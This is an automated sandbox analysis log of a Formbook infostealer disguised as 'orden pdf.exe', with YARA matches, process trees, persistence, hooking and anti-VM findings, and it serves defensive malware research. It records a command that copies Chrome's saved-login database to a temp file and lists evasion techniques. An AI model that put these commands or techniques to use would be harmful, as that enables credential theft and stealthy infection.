Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url, type: DROPPED Matched rule: Methodology_Suspicious_Shortcut_Local_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects local script usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@217/11@9/3
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BCE7A GetLastError,FormatMessageW, 0_2_001BCE7A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001AAB84 AdjustTokenPrivileges,CloseHandle, 0_2_001AAB84
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001AB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_001AB134
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001AAB84 AdjustTokenPrivileges,CloseHandle, 1_2_001AAB84
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001AB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 1_2_001AB134
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_001BE1FD
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle, 0_2_001B6532
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001CC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket, 0_2_001CC18C
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0017406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_0017406B
Source: C:\Windows\explorer.exe File created: C:\Program Files (x86)\Fxpx Jump to behavior
Source: C:\Users\user\Desktop\orden pdf.exe File created: C:\Users\user\assignedaccessproviderevents Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_01
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Fxpx Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\assignedaccessproviderevents\.vbs'
Source: orden pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\orden pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: orden pdf.exe Virustotal: Detection: 50%
Source: orden pdf.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\Desktop\orden pdf.exe File read: C:\Users\user\Desktop\orden pdf.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\orden pdf.exe 'C:\Users\user\Desktop\orden pdf.exe'
Source: unknown Process created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
Source: unknown Process created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
Source: unknown Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\assignedaccessproviderevents\.vbs'
Source: unknown Process created: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe 'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe'
Source: unknown Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\orden pdf.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe
Source: C:\Users\user\Desktop\orden pdf.exe Process created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe Jump to behavior
Source: C:\Users\user\Desktop\orden pdf.exe Process created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe 'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe' Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\orden pdf.exe' Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File written: C:\Users\user\AppData\Roaming\KN26O6T1\KN2logri.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: orden pdf.exe Static file information: File size 1550336 > 1048576
Source: orden pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: orden pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: orden pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: orden pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: orden pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: orden pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: orden pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: systray.pdb source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
Source: Binary string: systray.pdbGCTL source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: orden pdf.exe, 00000002.00000002.300447868.000000000185F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: orden pdf.exe
Source: orden pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: orden pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: orden pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: orden pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: orden pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018E01E LoadLibraryA,GetProcAddress, 0_2_0018E01E
PE file contains an invalid checksum
Source: DeviceCensus.exe.exe.0.dr Static PE information: real checksum: 0x12169b should be: 0x18746f
Source: cx9l_rq2dula.exe.3.dr Static PE information: real checksum: 0x12169b should be: 0x18746f
Source: orden pdf.exe Static PE information: real checksum: 0x12169b should be: 0x18746f
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018288B push 66001823h; retn 001Eh 0_2_001828E1
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00196B05 push ecx; ret 0_2_00196B18
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0018288B push 66001823h; retn 001Eh 1_2_001828E1
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00196B05 push ecx; ret 1_2_00196B18
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041681F push eax; retf 2_2_00416820
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00417BCB push ecx; ret 2_2_00417BD4
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041C6C5 push eax; ret 2_2_0041C718
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041C77C push eax; ret 2_2_0041C782
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041C712 push eax; ret 2_2_0041C718
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041C71B push eax; ret 2_2_0041C782
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017BD0D1 push ecx; ret 2_2_017BD0E4
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_01396B05 push ecx; ret 5_2_01396B18

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\orden pdf.exe File created: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Fxpx\cx9l_rq2dula.exe Jump to dropped file

Boot Survival:

barindex
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Desktop\orden pdf.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\orden pdf.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x93 0x37
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001D8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_001D8111
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_0018EB42
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001D8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 1_2_001D8111
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0018EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_0018EB42
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0019123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0019123A
Source: C:\Users\user\Desktop\orden pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\orden pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\orden pdf.exe RDTSC instruction interceptor: First address: 00000000004098B4 second address: 00000000004098BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\orden pdf.exe RDTSC instruction interceptor: First address: 0000000000409B2E second address: 0000000000409B34 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe RDTSC instruction interceptor: First address: 00000000009398B4 second address: 00000000009398BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe RDTSC instruction interceptor: First address: 0000000000939B2E second address: 0000000000939B34 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
